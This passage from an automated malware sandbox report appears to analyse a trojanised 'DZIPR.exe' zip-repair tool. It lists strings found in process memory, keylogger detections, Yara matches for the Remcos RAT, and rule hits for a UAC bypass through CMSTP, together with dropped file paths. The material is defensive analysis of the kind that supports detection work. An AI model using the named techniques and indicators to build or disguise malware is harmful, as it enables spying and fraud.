00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/support/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Potential key logger detected (key state polling based)

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE304EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	12_2_6FE304EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9204EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	13_2_6C9204EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB04EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	19_2_6FEB04EE

Yara detected Keylogger Generic

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
